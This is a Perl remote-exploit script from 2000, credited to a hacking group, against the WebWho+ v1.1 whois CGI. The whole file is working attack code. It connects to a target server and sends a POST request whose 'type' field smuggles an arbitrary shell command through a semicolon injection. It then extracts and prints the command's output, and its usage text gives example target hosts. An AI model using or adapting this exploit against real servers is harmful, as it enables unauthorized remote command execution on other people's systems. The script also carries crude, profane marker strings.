#!/usr/bin/perl # # hhp-webwho.pl # WebWho+ v1.1 (whois cgi) remote exploit. # # By: loophole of hhp. # # http://hhp.perlx.com/ # loophole@hhp.perlx.com # # Advisrory: http://hhp.perlx.com/ouradvisories/hhp-webwho.txt use IO::Socket; if (@ARGV < 2) { print "* hhp-webwho.pl\n"; print "* webwho.pl (whois cgi) remote exploit.\n"; print "* By: loophole of hhp.\n"; print "* loophole\@hhp.perlx.com\n"; print "* http://hhp.perlx.com/\n\n"; print "USAGE: $0 [-e ] \n\n"; print "* Server = www.example.com\n"; print "* File Extension = /cgi-bin/webwho.pl\n"; print "* Command = Shell command\n\n"; print "* NOTE: Defualt is /cgi-bin/webwho.pl\n"; print "* It only needs changing if it is not the defualt.\n\n"; print "* EXAMPLE: $0 www.gat.org id\n"; print "* OR: $0 www.gat.org -e /jack/webwho.pl id\n"; exit 0; } if ($ARGV[1] eq "-e") { if (@ARGV != 4) { print "Invalid Usage!\n"; exit 0; } $server = $ARGV[0]; $saywhatnig = $ARGV[2]; $command = $ARGV[3]; } else { if (@ARGV == 2) { $server = $ARGV[0]; $command = $ARGV[1]; $saywhatnig = "/cgi-bin/webwho.pl"; } } $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => 80, Proto => "tcp") or die "Wack connection.\n"; $calkuhlashun = 45 + length($command); print $sock "POST $saywhatnig HTTP/1.1\n"; print $sock "Accept-Language: en-us\n"; print $sock "Host: $server\n"; print $sock "Content-Length: $calkuhlashun\n"; print $sock "Connection: Keep-Alive\n\n"; print $sock 'command=X&type=";echo fukk;'; print $sock "$command"; print $sock ";echo fokk&Check=X\n"; $doot = 0; while(<$sock>) { s/\n//g; s/fukk
/--------Exploit Stats------------/; s/fokk
/-hhpfoelife-\n/; s/
//g; $foo = $_; if ($foo =~ /---Ex/) { $doot = 1; } if ($foo =~ /-hhpfoelife-/) { $doot = 0; print "---------------------------------\n"; exit 0; } if ($doot == 1) { print "$foo\n"; } } exit 0; # www.hack.co.za [2000]#